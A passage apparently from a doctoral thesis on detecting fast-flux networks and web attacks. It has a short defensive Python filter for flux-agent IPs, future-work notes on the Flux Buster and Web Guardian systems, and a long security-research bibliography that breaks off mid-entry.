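    """Drop candidate flux-agent IPs that point to popular websites."""
    return candidate_ips - popular_site_ips

candidates = {"203.0.113.7", "198.51.100.2", "192.0.2.10"}
popular = {"192.0.2.10"}  # e.g., the IP of a well-known CDN node
print(filter_flux_agents(candidates, popular))
```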

These points evidence that the design of our systems may effectively face an ad-
versarial environment. Nevertheless, thanks to our general study in Chapter 5, we
recognize some open issues and ways of improvement:

• Flux Buster

– We must verify the actual false negative rate, because it is (unlikely,
but) possible that some flux domain names are actually discarded by our
pre-filtering stage. For example, we could select filtered domain names
whose patterns are placed near the decision surface of our pre-filtering
stage. Then, we may analyze them using other fast flux detection tools
(e.g., [DNSBL]). Furthermore, we may look for filtered domain names
which share some resolved IP addresses with our pool of flux agents.

• Web Guardian

– A more extensive experimental evaluation is necessary.

– We may cope with false alarm injection attacks. To this end, we may
provide automatic alert verification mechanisms; depending on the type
of anomalies, a well-suited alert verification technique may be defined.
Also, as mentioned in Section 5.9, even if a false alarm injection
attack is performed, automatic counteractions may still prevent attackers
from successfully exploiting web services.

– Web Guardian may not be able to spot attacks targeting the logic of web
applications. To this end, other features must be added.

– Alerts describe detailed anomalies, but not attacks. We may group
anomalies and infer the attack class, to provide more informative
reports. The idea is similar to that proposed in [Robertson et al. (2006)]
and, in particular, in [Bolzoni et al. (2009)].

We are currently working to address all these issues and further improve our
systems. On the other hand, we obtained promising results, and further improvement
is the natural course of research.
Bibliography

[Admin (2002)] admin@cgisecurity.com (2002). The Cross Site Scripting FAQ,


Packet storm security ⇒ web link (accessed February 2010) 84

[Akritidis et al. (2005)] Akritidis, P., Markatos, E.P., Polychronakis, M., Anagnos-
takis, K. (2005). STRIDE: Polymorphic Sled Detection through Instruction Se-
quence Analysis. Security and Privacy in the Age of Ubiquitous Computing,
Springer, 181, 375-391. 118

[Aleph One] Aleph One. Smashing The Stack For Fun And Profit, Phrack 49, vol.
7, insecure.org ⇒ web link (accessed February 2010) 105

[Almuallim and Dietterich (1992)] Almuallim, H., Dietterich, T.G., (1992). Effi-
cient algorithms for identifying relevant features. Proceedings of the Ninth Cana-
dian Conference on Artificial Intelligence, Vancouver, BC, Morgan Kaufmann,
38-45. 125

[Apache Vulnerabilities] The Apache Software Foundation. Apache httpd 2.0 vul-
nerabilities, ⇒ web link (accessed February 2010) 58

[Antichi et al. (2009)] Antichi, G., Ficara, D., Giordano, S., Procissi, G., Vitucci F.
(2009). Counting bloom filters for pattern matching and anti-evasion at the wire
speed. IEEE Network, 23(1), 30-35. 99

[Asimov (1956)] Asimov I. (1956). I, Robot, Signet, New York, NY, USA. 3

[Atlas] Atlas, Fast Flux Network Detection, Arbor Networks ⇒ web link (accessed
February 2010) 43

[Auger (2010)] Auger, R. (2010). Remote File Inclusion, The Web Application Se-
curity Consortium ⇒ web link (accessed February 2010) 84

[Axelsson (2000)] Axelsson, S. (2000). The Base-Rate Fallacy and its Implications
for the Difficulty of Intrusion Detection, In Proceedings of the 6th ACM Confer-
ence on Computer and Communications Security, pp. 1-7, November 1-4, 1999,
Kent Ridge Digital Labs, Singapore, ACM. 115

[Bajpai (2009)] Bajpai, G. (2009). HP OpenView NNM HTTP Accept-Language
header Buffer Overflow Vulnerability, iPolicy Networks Security Advisory ⇒ web
link (accessed February 2010) 84

[Barreno et al. (2006)] Barreno, M., Nelson, B., Sears, R., Joseph, A.D., Tygar,
J.D., (2006). Can machine learning be secure?, In Proceedings of the 2006 ACM
Symposium on Information, computer and communications security, ACM, pp.
16-25. 72, 110, 111, 112

[Basicevic et al. (2005)] Basicevic, I., Popovic, M., Kovacevic, V., (2005). The Use
of Distributed Network-Based IDS Systems In Detection of Evasion Attacks.
IEEE Proceedings of the Advanced Industrial Conference on Telecommunica-
tions Workshop, IEEE, pp. 78-82. 99

[Bass (2000)] Bass, T. (2000), Intrusion detection systems and multisensor data
fusion. ACM, 43(4), 99-105. 127

[Bellamy (2002)] Bellamy, W. (2002). HyperText Transfer Protocol (HTTP) Header


Exploitation, Advanced Incident Handling and Hacker Exploits, SANS GIAC
GCIH Practical Assignment v2.1 ⇒ web link (accessed January 2010) 84

[Ben-Asher (2009)] Ben-Asher, N., Meyer J., Möller, S., Englert R. (2009), An Ex-
perimental System for Studying the Tradeoff between Usability and Security, In-
ternational Conference on Availability, Reliability and Security, IEEE Computer
Society, pp.882-887. 3

[Berners-Lee (1991)] Berners-Lee, T. (1991). WorldWideWeb - Executive Summary


⇒ web link (accessed January 2010) 9

[Bertoni et al. (2004)] Bertoni, A., Folgieri, R., Valentini, G., (2004). Feature selec-
tion combined with random subspace ensemble for gene expression based diagnosis
of malignancies. Biological and Artificial Intelligence Environments, B.Apolloni,
M.Marinaro and R. Tagliaferri eds, Springer, 29-36. 108

[Bolzoni et al. (2007)] Bolzoni, D., Crispo, B., Etalle, S. (2007). ATLANTIDES:
An Architecture for Alert Verification in Network Intrusion Detection Systems.
Proceedings of the 21st Large Installation System Administration Conference,
USENIX Association, 141-152. 127, 134

[Bolzoni and Etalle (2008)] Bolzoni, D., Etalle, S. (2008). Boosting Web Intrusion
Detection Systems by Inferring Positive Signatures, In Proceedings of the OTM
2008 Confederated International Conferences, CoopIS, DOA, GADA, IS, and
ODBASE 2008. Part II on On the Move to Meaningful Internet Systems,
Springer-Verlag, pp. 938-955. 61

[Bolzoni et al. (2009)] Bolzoni, D., Etalle, S., Hartel, P.H. (2009). Panacea: Au-
tomating Attack Classification for Anomaly-Based Network Intrusion Detection
Systems, Recent Advances in Intrusion Detection (RAID), 12th International
Symposium, Lecture Notes in Computer Science, Springer. 64, 86, 139

[Borders et al. (2006)] Borders, K., Zhao, I., Prakash, A. (2006). Siren: Catching
Evasive Malware (Short Paper). Proceedings of the 2006 IEEE Symposium on
Security and Privacy, IEEE Computer Society, 78-85. 123

[Bradley (1997)] Bradley, A.P. (1997). The use of the area under the ROC curve in
the evaluation of machine learning algorithms, Pattern Recognition, vol. 30(7),
pp.1145-1159. 42

[Bright (2007)] Bright, A. (2007). Estonia accuses Russia of cyberattack , The


Christian Science Monitor ⇒ web link (accessed January 2010) 12

[Brisco (1995)] Brisco, T. (1995). DNS Support for Load Balancing, Network Work-
ing Group, RFC 1794 ⇒ web link (accessed January 2010) 22

[Breunig et al. (2000)] Breunig, M.M., Kriegel H., Ng, R.T., Sander, J. (2000).
LOF: Identifying Density-Based Local Outliers. Proceedings of the 2000 ACM
SIGMOD International Conference on Management of Data, ACM, 93-104. 73

[Brown (2003)] Brown, W., (2003). Evading Network Security Devices Utilizing Se-
cure Shell, SANS Security Essentials (GSEC) Practical Assignment ⇒ web link
(accessed December 2007). 96

[Butler and Hoglund (2004)] Butler J., Hoglund, G. (2004). VICE - Catch the hook-
ers. http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-butler/bh-us-
04-butler.pdf. Last access: August 2009. 101

[Byeong-Cheol et al. (2004)] Byeong-Cheol, C., Dong-il, S., Sung-Won, S., (2004).
Two-step Rule Estimation (TRE) - Intrusion Detection Method against evading
NIDS. Advanced Communication Technology Conference, IEEE, 1, 504-507. 118

[CAPEC (2007)] Common Attack Pattern Enumeration and Classification
(CAPEC)-86: Embedding Script (XSS) in HTTP Headers, MITRE Corpora-
tion, ⇒ web link (accessed February 2010) 84

[Casey (2004)] Casey, E. (2004). Digital Evidence and Computer Crime (Electronic
Version), Elsevier, San Diego, CA. 4

[Cenzic (2009)] Cenzic, Inc. (2009). Web Application Security Trends Report ⇒ web
link (accessed January 2010) 13

[CERT (1996)] CERT (1996). TCP SYN Flooding and IP Spoofing Attacks, Advi-
sory CA-1996-21 ⇒ web link (accessed February 2010) 58

[CGI v.1.1 (2004)] Robinson, D., Coar, K. (2004). The Common Gateway Interface
(CGI) Version 1.1, The Internet Society. ⇒ web link (accessed December 2009).
10

[CGIsec] CGI Security, Parameter Manipulation attacks ⇒ web link (accessed


February 2010) 78

[Chen and Leneutre (2009)] Chen, L., Leneutre, J. (2009). A Game Theoretical
Framework on Intrusion Detection in Heterogeneous Networks. IEEE Transac-
tions on Information Forensics & Security. 93

[CIDF] Staniford-Chen, S., Tung, B., Schnackenberg, D. (1998). The Common In-
trusion Detection Framework (CIDF). Appears in: Proceedings of the Informa-
tion Survivability Workshop, Orlando (USA) ⇒ web link (accessed February
2010) 4

[Cisco IPS] Cisco Systems Inc., Intrusion Prevention Systems Help Stop Threats ⇒
web link (accessed January 2010) 5, 102, 117, 129

[Cordasco and Wetzel (2009)] Cordasco, J., Wetzel, S. (2009). An attacker model
for MANET routing security. WiSec '09: Proceedings of the second ACM con-
ference on Wireless network security, ACM, pp. 87-94. 93

[Corona et al. (2008)] Corona, I., Giacinto, G., Roli, F., (2008). Intrusion Detection
in Computer Systems using Multiple Classifier Systems. In Supervised and Unsu-
pervised Ensemble Methods and Their Applications, O. Okun and G. Valentini
(eds), Springer-Verlag, Berlin/Heidelberg. 125

[Corona et al. (2009)] Corona, I., Giacinto, G., Mazzariello, C., Roli, F., Sansone,
C. (2009). Information fusion for computer security: State of the art and open
issues. Information Fusion, 10(4), pp. 274-284. 132

[Corona et al. (2009)] Corona, I., Ariu, D., Giacinto, G. (2009). HMM-Web: a
framework for the detection of attacks against Web applications, IEEE ICC 2009,
Dresden, Germany. 18, 63

[Cretu et al. (2008)] Cretu, G.F., Stavrou, A., Locasto, M.E., Stolfo, S.J.,
Keromytis, A.D. (2008). Casting out Demons: Sanitizing Training Data for
Anomaly Sensors. In the Proceedings of the IEEE Symposium on Security &
Privacy, Oakland, CA. 61, 72, 112

[CVE] Mitre Corporation (2010). Common Vulnerabilities and Exposures ⇒ web


link (accessed January 2010) 11, 65

[Debar and Wespi (2001)] Debar, H., Wespi, A., (2001). Aggregation and Correla-
tion of Intrusion-Detection Alerts. Recent Advances in Intrusion Detection Sym-
posium, Springer-Verlag, 2212, 85-103. 127

[DNSBL] dnsbl.abuse.ch, Fast Flux Tracker ⇒ web link (accessed January 2010)
43, 48, 139

[Donaldson (2002)] Donaldson, M.E. (2002). Inside the Buffer Overflow Attack:
Mechanism, Method, & Prevention, SANS Institute InfoSec Reading Room,
SANS Whitepaper ⇒ web link (accessed January 2010) 84

[Duda et al. (2000)] Duda, R. O., Hart, P. E., Stork, D. G. (2000). Pattern Classi-
fication (2nd Edition), Wiley-Interscience. 108

[Dugad et al. (1998)] Dugad, R., Ahuja, N. (1998). Unsupervised multidimen-
sional hierarchical clustering, In Proceedings of the IEEE International Confer-
ence on Acoustics, Speech and Signal Processing. 35

[Ezeife et al. (2008)] Ezeife, C.I, Dong, J., Aggarwal, A.K. (2008). SensorWebIDS: a
web mining intrusion detection system, International Journal of Web Information
Systems, vol. 4(1), pp. 97-120. 61, 62

[Fogla and Lee (2006)] Fogla, P., Lee, W., (2006). Evading Network Anomaly De-
tection Systems: Formal Reasoning and Practical Techniques. Proceedings of the
13th ACM conference on Computer and communications security, pp. 59-68. 123

[FP (2005)] Agence France-Presse (2005). Hacker Attacks In US Linked To Chinese


Military: Researchers, Space War ⇒ web link (accessed January 2010) 12

[Franklin et al. (2007)] Franklin, J., Paxson, V., Perrig, A., Savage, S. (2007). An
inquiry into the nature and causes of the wealth of internet miscreants. In Pro-
ceedings of the 14th ACM conference on Computer and Communications Secu-
rity, (Alexandria, Virginia, USA, October 28 - 31, 2007). CCS '07. ACM, New
York, NY, 375-388. 12

[Gadaleta et al. (2009)] Gadaleta, F., Younan, Y., Jacobs, B., Joosen, W., De Neve,
E., Beosier, N. (2009). Instruction-level countermeasures against stack-based
buffer overflow attacks. Proceedings of the 1st EuroSys Workshop on Virtu-
alization Technology for Dependable Systems, ACM, 7-12. 103

[Garfinkel and Rosenblum (2003)] Garfinkel, T., Rosenblum, M. (2003). A Virtual
Machine Introspection Based Architecture for Intrusion Detection. Proceedings
of the Network and Distributed Systems Security Symposium (NDSS), 191-206.
103, 109

[Giacinto et al. (2003)] Giacinto, G., Roli, F., Didaci, L., (2003). Fusion of multiple
classifiers for intrusion detection in computer networks. Pattern Recognition
Letters, 24(12), 1795-1803. 125

[Gorton and Champion (2003)] Gorton, A.S., Champion, T.G. (2003). Combining
Evasion Techniques to Avoid Network Intrusion Detection Systems. Skaion,
http://www.skaion.com/research/tgc-rsd-raid.pdf. Last access: 28 September
2007. 99

[Green et al. (2007)] Green, I., Raz, Z., Zviran, M. (2007). Analysis of active In-
trusion Prevention data for Predicting hostile activity in Computer Networks.
ACM, 50(4), 63-68. 130

[Guyet et al. (2009)] Guyet, T., Quiniou, R., Wang, W., Cordier, M. (2009). Self-
adaptive web intrusion detection system, The Computing Research Repository
(CoRR), ACM, vol. abs/0907.3819. 62

[Gyongyi et al. (2005)] Gyongyi, Z., Garcia-Molina, H. (2005). Web spam taxonomy,
In Proceedings of the First International Workshop on Adversarial Information
Retrieval on the Web 28

[Ollmann (2009)] Ollmann, G. (2009). Serial Variant Evasion Tactics: Techniques


Used to Automatically Bypass Antivirus Technologies, Damballa, Inc. ⇒ web
link (accessed January 2010) 16

[Ollmann (2008)] Ollmann, G. (2008). User-Agent Attacks, Whitepaper ⇒ web link


(accessed January 2010) 78

[Handley et al. (2001)] Handley, M., Paxson, V., Kreibich, C., (2001). Network In-
trusion Detection: Evasion, Traffic Normalization, and End-to-End Protocol Se-
mantics. Proceedings of the 10th USENIX Security Symposium, USENIX Asso-
ciation, 10, 9-9. 99

[Hansen (2009)] Hansen, R. (2009). XSS (Cross Site Scripting) Cheat Sheet for filter
evasion, ha.ckers.org ⇒ web link (accessed January 2010) 16, 59, 84

[Harmer et al. (2002)] Harmer, P.K., Williams, P.D, Gunsch, G.H., Lamont, G.B.,
(2002). An artificial immune system architecture for computer security applica-
tions, Appears in: IEEE Transactions on Evolutionary Computation, vol. 6(3),
pp. 252-280. 4

[Hedberg, S. (1996)] Hedberg, S., (1996). Combating computer viruses: IBM's new
computer immune system, Parallel & Distributed Technology: Systems & Ap-
plications, IEEE, vol. 4(2), pp. 9-11. 4

[Hernacki et al. (2005)] Hernacki, B., Bennett, J., Hoagland, J., (2005). An
overview of network evasion methods. Information Security Technical Report,
ELSEVIER, 10, 140-149. 96, 97, 98

[Heymann et al. (2007)] Heymann, P., Koutrika, G., Garcia-Molina, H. (2007).
Fighting Spam on Social Web Sites: A Survey of Approaches and Future Chal-
lenges, IEEE Internet Computing, vol. 11(6), pp. 36-45. 28

[Ho (1998)] Ho, T. K., (1998). The Random Subspace Method for Constructing De-
cision Forests. IEEE Transactions on Pattern Analysis and Machine Intelligence,
20(8), 832-844. 125

[Hofmann and Beaumont (2005)] Hofmann, M., Beaumont, L.R. (2005). Content
Networking: Architecture, Protocols, and Practice. Morgan Kaufmann Publisher.
22

[Hoglund and Butler (2006)] Hoglund, G., Butler, J. (2006). Rootkits: Subverting
the Windows Kernel. Addison-Wesley. 101

[Holz et al. (2008)] Holz, T., Gorecki, C., Rieck, K., Freiling, F. (2008). Measur-
ing and Detecting Fast-Flux Service Networks, NDSS '08: Proceedings of the
Network & Distributed System Security Symposium 26, 27, 28

[Hu et al. (2009)] Hu, X., Knysz, M., Shin, K.G. (2009). RB-Seeker: Auto-detection
of Redirection Botnets, Annual Network & Distributed System Security Sympo-
sium (NDSS). 27

[IBM ISS IPS] IBM Internet Security Systems, Proventia Network Intrusion Pre-
vention System ⇒ web link (accessed January 2010) 5, 102, 117, 129

[IBM (2009)] IBM Internet Security Systems X-Force 2008 Trend & Risk Report.
⇒ web link (accessed December 2009). 12

[Ingham et al. (2007)] Ingham, K.L., Somayaji, A., Burge, J., Forrest, S. (2007).
Learning DFA representations of HTTP for protecting web applications, Computer
Networks, vol. 51, pp. 1239-1255. 60, 63, 69

[IPv4] Network Sorcery, Inc. Internet Protocol version 4 ⇒ web link (accessed
February 2010) 97

[Jain et al. (1988)] Jain, A.K., Dubes, R.C. (1988). Algorithms for clustering data,
Prentice-Hall, Inc. 33, 35, 39

[Jain et al. (1999)] Jain, A.K., Murty, M.N., Flynn, P. J. (1999). Data clustering:
a review, ACM Computing Surveys, vol. 31(3), pp.264-323. 33, 39

[Johnson (2000)] Johnson, K. (2000). Mafiaboy trying to stare down prosecutors –
Lawyer, USA Today. ⇒ web link (accessed December 2009). 10

[Jones (1998)] Jones, L. (1998). The Good Times email virus is a hoax! ⇒ web link
(accessed December 2009). 9

[Juniper (2002)] Juniper Networks (2002). HTTP: Apache WebDav PROPFIND Di-
rectory Disclosure ⇒ web link (accessed January 2010) 84

[K-159 (2009)] K-159 (2009). Joomla Hotel Booking System Component XSS/SQL
Injection Multiple Vulnerability, Milw0rm.com ⇒ web link (accessed January
2010) 58

[Kayacik et al. (2006)] Kayacik, H.G., Heywood, M., Zincir-Heywood, N., (2006).
On Evolving Buffer Overflow Attacks Using Genetic Programming. Proceedings
of the 8th annual conference on Genetic and evolutionary computation, ACM,
1667-1674. 117

[Kayacik et al. (2007)] Kayacik, H.G., Zincir-Heywood, A.N., Heywood, M.I.,


(2007). Automatically Evading IDS Using GP Authored Attacks. Proceedings
of the 2007 IEEE Symposium on Computational Intelligence in Security and
Defense Applications, IEEE, 153-160. 122

[Kearns and Ming (1988)] Kearns, M., Li, M. (1988). Learning in the presence
of malicious errors. Proceedings of the twentieth annual ACM symposium on
Theory of computing, 267-280. 111

[Kehoe (1992)] Kehoe, B.P. (1992). Zen and the Art of the Internet: a Beginner's
Guide to the Internet, ⇒ web link (accessed January 2010) 9

[Kenney (1997)] Kenney, M. (1997). Ping of Death attack, insecure.org ⇒ web link
(accessed January 2010) 121

[Kuncheva (2004)] Kuncheva, L. (2004). Combining Pattern Classifiers, Wiley. 64

[Kolesnikov and Lee (2004)] Kolesnikov, O., Lee, W. (2004). Advanced Polymorphic
Worms: Evading IDS by Blending in with Normal Traffic, Technical Report,
Georgia Tech. ftp://ftp.cc.gatech.edu/pub/coc/tech_reports/2004/GIT-CC-04-
15.pdf. Last access: July 2009. 123

[Konte et al. (2009)] Konte M., Feamster, N., Jung, J. (2009). Dynamics of Online
Scam Hosting Infrastructure, PAM '09: Proc. Passive and Active Measurement
Conference 26, 27, 28, 37

[Kreibich and Crowcroft (2003)] Kreibich, C., Crowcroft, J., (2003). Honeycomb -
Creating intrusion detection signatures using honeypots. ACM SIGCOMM Com-
puter Communication Review, ACM, 34(1), 51-56. 105

[Kruegel et al. (2004)] Kruegel, C., Robertson, W., Vigna, G., (2004). Using Alert
Verification to Identify Successful Intrusion Attempts. Journal of Practice in
Information Processing and Communication (PIK), 27(4), 219-227. 126

[Kruegel et al. (2005) (a)] Kruegel, C., Vigna, G., Robertson, W. (2005). A multi-
model approach to the detection of web-based attacks. Computer Networks, 48(5),
717-738. 60, 61, 63, 70, 76, 89, 110, 122

[Kruegel et al. (2005) (b)] Kruegel, C., Valeur, F., Vigna, G., (2005). Intrusion De-
tection and Correlation: Challenges and Solutions. Advances in Information Se-
curity, Springer-Verlag TELOS. 127

[Krueger et al. (2010)] Krueger, T., Gehl, C., Rieck, K., Laskov, P. (2010). Tok-
Doc: A Self-Healing Web Application Firewall, In Proceedings of 25th ACM
Symposium on Applied Computing (SAC). 63, 64

[KYE (2007)] The Honeynet Project (2007). Know Your Enemy: Fast-Flux Service
Networks ⇒ web link (accessed January 2010) 25, 31

[Lancaster (2007)] Lancaster, T., (2007). IPv6 & IPv4 Threat Review with Dual-
Stack Considerations, 6journal, Whitepaper. 101

[Lam et al. (2004)] Lam, K., LeBlanc, D., Smith, B., (2004). Assessing Network
Security, Microsoft Press, One Microsoft Way, Redmond, Washington. 3

[Lau (2009)] Lau, K. (2009). Fake security tools still big threat, worms on rise, Com-
puterworld Canada, November 2009 ⇒ web link (accessed January 2010) 10

[Lee and Xiang (2001)] Lee, W., Xiang, D., (2001). Information-theoretic measures
for anomaly detection. IEEE Symposium on Security and Privacy, 130-143. 128

[Lee et al. (2005)] Lee, K., Chari, S., Shaikh, A., Sahu, S., Cheng, P. (2005). Pro-
tecting content distribution networks from denial of service attacks, In IEEE
International Conference on Communications, vol. 2, pp. 830-836. 58

[Lee et al. (2008)] Lee, W., Wang, C., Dagon D. Eds. (2008). Botnet Detection:
Countering the Largest Security Threat, Advances in Information Security, vol.
36, Springer. 11

[Lemos (2001)] Lemos, R. (2001). FBI hack raises global security concerns, CNET
News.com ⇒ web link (accessed December 2009). 4

[Likarish (2009)] Likarish, P., Jung, E. (2009). Leveraging Google SafeBrowsing to


Characterize Web-based Attacks, In ACM Conference on Computer and Com-
munications Security (CCS 2009), November 2009. 45

[Linhart et al. (2005)] Linhart, C., Klein, A., Heled, R., Orrin, S. (2005). HTTP
Request Smuggling, Watchfire ⇒ web link (accessed January 2010). 84

[Lippman et al. (2000)] Lippmann, R., Haines, J., Fried, D., Korba, J., Das, K.
(2000). The 1999 DARPA off-line intrusion detection evaluation, Computer Net-
works, vol. 34, pp. 579-595. 60

[Liu et al. (2005)] Liu, Z., Lin, W., Li, N., Lee, D. (2005). Detecting and filtering
instant messaging spam - a global and personalized approach, In Proceedings of
the 1st IEEE ICNP Workshop on Secure Network Protocols 28

[Lunt et al. (1992)] Lunt, T.F., Tamaru, A., Gilham, F., Jagannathan, R., Jalali,
C., Neumann, P.G., Javitz, H.S., Valdes, A., Garvey, T.D. (1992). A Real-time
Intrusion Detection Expert System (IDES), Final Technical Report, February
28, 1992, SRI International. 95

[Mac Vittie (2007)] Mac Vittie, L. (2007). SQL Injection Evasion Detection, F5
Whitepaper ⇒ web link (accessed January 2010) 16, 60, 84

[Mac Vittie (2010)] Mac Vittie, L. (2010). I am in your HTTP headers, attacking
your application, F5 Whitepaper ⇒ web link (accessed January 2010) 84

[Manion (2003)] Manion, A. (2003). Web servers enable HTTP TRACE method by
default, Vulnerability Note VU#867593, US-CERT ⇒ web link (accessed Jan-
uary 2010) 84

[Maslow (1943)] Maslow, A.H. (1943). A Theory of Human Motivation, Psycholog-


ical Review, vol. 50, pp. 370-396 ⇒ web link (accessed January 2010) 1

[Miller (2007)] Miller C. (2007). The legitimate vulnerability market: Inside the se-
cretive world of 0-day exploit sales. In Sixth Workshop on the Economics of
Information Security, Independent Security Evaluators ⇒ web link (accessed
January 2010) 11

[Mills (2009)] Mills, E. (2009). Botnet worm in DOS attacks could wipe data out on
infected PCs, CNET News ⇒ web link (accessed January 2010) 12

[milw0rm] milw0rm.com, ⇒ web link (accessed February 2010) 66, 68, 69

[Mishne et al. (2005)] Mishne, G., Carmel, D., Lempel, R. (2005). Blocking Blog
Spam with Language Model Disagreement, In Proceedings of the First Interna-
tional Workshop on Adversarial Information Retrieval on the Web 28

[Mitnick (2002)] Mitnick, K. (2002). The Art of Deception, Wiley Publishing Ltd:
Indianapolis, United States of America. 25

[Modsecurity] Breach security. Modsecurity web application firewall ⇒ web link (ac-
cessed January 2010) 60, 64

[Mutz et al. (2005)] Mutz, D., Kruegel, C., Robertson, W., Vigna, G., Kem-
merer, R.A., (2005). Reverse Engineering of Network Signatures. Proceedings of
the AusCERT Asia Pacic Information Technology Security Conference (Gold
Coast, Australia), University of Queensland. 58, 108, 117, 119

[Nazario et al. (2008)] Nazario J., Holz, T. (2008). As the net churns: Fast-flux
botnet observations, MALWARE '08: Proceedings of the 3rd International Con-
ference on Malicious and Unwanted Software 26, 27, 28

[NIST FIPS199 (2004)] National Institute of Standards and Technology (2004).


Standards for Security Categorization of Federal Information and Information
Systems, Federal Information Processing Standards Publication 199 ⇒ web link
(accessed December 2009). 2

[Newsome et al. (2005)] Newsome, J., Karp, B., Song, D., (2005). Polygraph: Au-
tomatically generating signatures for polymorphic worms. In Proceedings of the
IEEE Symposium on Security and Privacy, 226- 241. 105, 107

[Newsome et al. (2006)] Newsome, J., Karp, B., Song, D., (2006). Paragraph:
Thwarting Signature Learning by Training Maliciously. Recent Advances in In-
trusion Detection, Springer, 4219, 81-105. 105, 107

[Ng (2009)] Ng, V. (2009). New botnet spams links to sites hosted in Beijing and
Seoul, Search Security Asia ⇒ web link (accessed January 2010) 12

[Northcutt (1999)] Northcutt, S. (1999). Intrusion Detection FAQ: What was the
Melissa virus and what can we learn from it?, SANS Flash Report. ⇒ web link
(accessed December 2009). 9

[Northcutt and Novak (2001)] Northcutt, S., Novak J., (2001). Network Intrusion
Detection. New Riders Publishing, 201 West 103rd Street, Indianapolis. 100

[NTPpool] NTP pool project ⇒ web link (accessed January 2010) 40



[OASIS] OASIS, Overlay Anycast Service InfraStructure ⇒ web link (accessed Jan-
uary 2010). 40

[OWASP (2010)] Open Web Application Security Project (2010). The Ten most
Critical Web Application Security Risks (RC 2010) ⇒ web link (accessed Jan-
uary 2010) 15

[Page (1988)] Page, B. (1988). A report on the Internet Worm, University of Lowell,
Computer Science Department ⇒ web link (accessed January 2010) 9

[Passerini et al. (2008)] Passerini, E., Paleari, R., Martignoni, L., Bruschi, D.
(2008). FluXOR: Detecting and Monitoring Fast-Flux Service Networks, DIMVA
'08: Proceedings of the 5th international conference on Detection of Intrusions
and Malware, and Vulnerability Assessment 26, 27, 28, 36, 38

[Pastor (2009)] Pastor, A. (2009). CVE-2009-1151: phpMyAdmin Remote Code Ex-


ecution Proof of Concept, GNUCitizen ⇒ web link (accessed February 2010)
84

[Patton et al. (2001)] Patton, S., Yurcik, B., Doss, D., (2001). An Achilles' heel in
signature-based IDS: Squealing false positives in SNORT. Proceedings of RAID
2001 fourth International Symposium on Recent Advances in Intrusion Detec-
tion, Illinois State University. 120

[Paxson and Handley (1999)] Paxson, V., Handley, M. (1999). Defending Against
Network IDS Evasion. Proceedings of RAID 1999 International Symposium on
Recent Advances in Intrusion Detection. 99, 126

[PCI] PCI Security Standards Council. About the PCI Data Security Standard ⇒
web link (accessed January 2010) 15

[Perdisci et al. (2006) (a)] Perdisci, R., Dagon, D., Lee, W., Fogla, P., Sharif, M.,
(2006). Misleading Worm Signature Generators Using Deliberate Noise Injection.
Proceedings of the 2006 IEEE Symposium on Security and Privacy. 105, 107

[Perdisci et al. (2006) (b)] Perdisci, R., Gu, G., Lee, W. (2006). Using an ensemble
of one-class SVM classifiers to harden payload-based anomaly detection systems,
In Proceedings of the Sixth International Conference on Data Mining, IEEE
Computer Society, pp. 488-498. 64, 125, 128

[Perdisci, Corona et al. (2009)] Perdisci, R., Corona, I., Dagon, D., Lee, W. (2009).
Detecting Malicious Flux Service Networks through Passive Analysis of Recur-
sive DNS Traces, Annual Computer Security Applications Conference (ACSAC),
Honolulu, Hawaii, USA. 17

[Perks (2006)] Perks, M. (2006). Best practices for software development projects,
IBM Software Services for WebSphere, International Business Machines Corpo-
ration ⇒ web link (accessed December 2009). 2

[PHP IDS] PHP IDS, PHP-Intrusion Detection System ⇒ web link (accessed Jan-
uary 2010) 60

[Polychronakis et al. (2007)] Polychronakis, M., Anagnostakis, K.M., Markatos,


E.P. (2007). Network-Level Polymorphic Shellcode Detection Using Emulation,
In Journal in Computer Virology, 2(4), 257-274. 106

[Porras (2009)] Porras, P. (2009). Directions in Network-Based Security Monitoring.


IEEE Security and Privacy, 7(1), 82-85. 16

[Poulsen, K. (2001)] Poulsen, K. (2001). Lamo's Adventures in WorldCom, Securi-
tyFocus ⇒ web link (accessed December 2009). 10

[PSS (2002)] Packet Storm Security (2002). Apache 2.0 Cross-Site Scripting Vul-
nerability, ⇒ web link (accessed February 2010) 84

[Ptacek and Newsham (1998)] Ptacek, T., Newsham, T.N., (1998). Insertion, Eva-
sion, and Denial of Service: Eluding Network Intrusion Detection, Secure Net-
works Inc. ⇒ web link (accessed February 2010) 95, 96, 97

[Quinlan (1993)] Quinlan, J.R. (1993). C4.5: Programs for Machine Learning,
Morgan Kaufmann Publishers. 38, 41

[Rabiner (1989)] Rabiner, L.R. (1989). A tutorial on hidden markov models and
selected applications in speech recognition, In Proceedings of the IEEE, vol. 77(2),
pp. 257-286. 67, 75

[Raven (1995)] Raven, F.H. (1995). Automatic Control Engineering, McGraw-Hill,


Inc., New York, NY, USA. 3

[RFC 792 (1981)] Network Working Group (1981). Internet Control Message Pro-
tocol, Internet Society ⇒ web link (accessed February 2010) 121

[RFC 2616 (1999)] Network Working Group (1999). Hypertext Transfer Protocol –
HTTP/1.1, Internet Society ⇒ web link (accessed February 2010) 12, 65, 77, 80

[RFC 2818 (2000)] Network Working Group (2000). HTTP Over TLS, Internet So-
ciety ⇒ web link (accessed February 2010) 12, 96

[RFC 4252 (2006)] Network Working Group (2006). The Secure Shell (SSH) Proto-
col Architecture, Internet Society ⇒ web link (accessed February 2010) 96

[Riley et al. (2009)] Riley, R., Jiang, X., Xu, D. (2009). Multi-aspect profiling of
kernel rootkit behavior. Proceedings of the fourth ACM european conference on
Computer systems, ACM, 47-60. 103

[Rolando (2006)] Rolando, M., Rossi, M., Sanarico, N., Mandrioli, D., (2006). A
formal approach to sensor placement and configuration in a network intrusion
detection system. Proceedings of the 2006 international workshop on Software
engineering for secure systems, ACM, 65-71. 100

[Robertson et al. (2006)] Robertson, W., Vigna, G., Kruegel, C., Kemmerer, R.
(2006). Using Generalization and Characterization Techniques in the Anomaly-
based Detection of Web Attacks, In Proceeding of the Network and Distributed
System Security Symposium (NDSS), San Diego, CA. 61, 64, 86, 139

[SAC (2008)] SSAC (2008), SAC 025 - SSAC Advisory on Fast Flux Hosting and
DNS ⇒ web link (accessed January 2010) 22, 25

[SANS (2009)] SANS Institute (2009). The Top Cyber Security Risks - September
2009. ⇒ web link (accessed January 2010) 10, 11, 14, 15

[SH (2010)] Spamhaus (2010). The World's Worst Spammers ⇒ web link (accessed
January 2010) 25

[Shafer (1986)] Shafer, G. (1986). A Mathematical Theory of Evidence, Princeton
University Press, Princeton. 62

[Shah (2004)] Shah, S. (2004). An Introduction to HTTP fingerprinting, Net square
⇒ web link (accessed January 2010) 84

[Shiels, M. (2010)] Shiels, M. (2010). Security experts say Google cyber-attack was
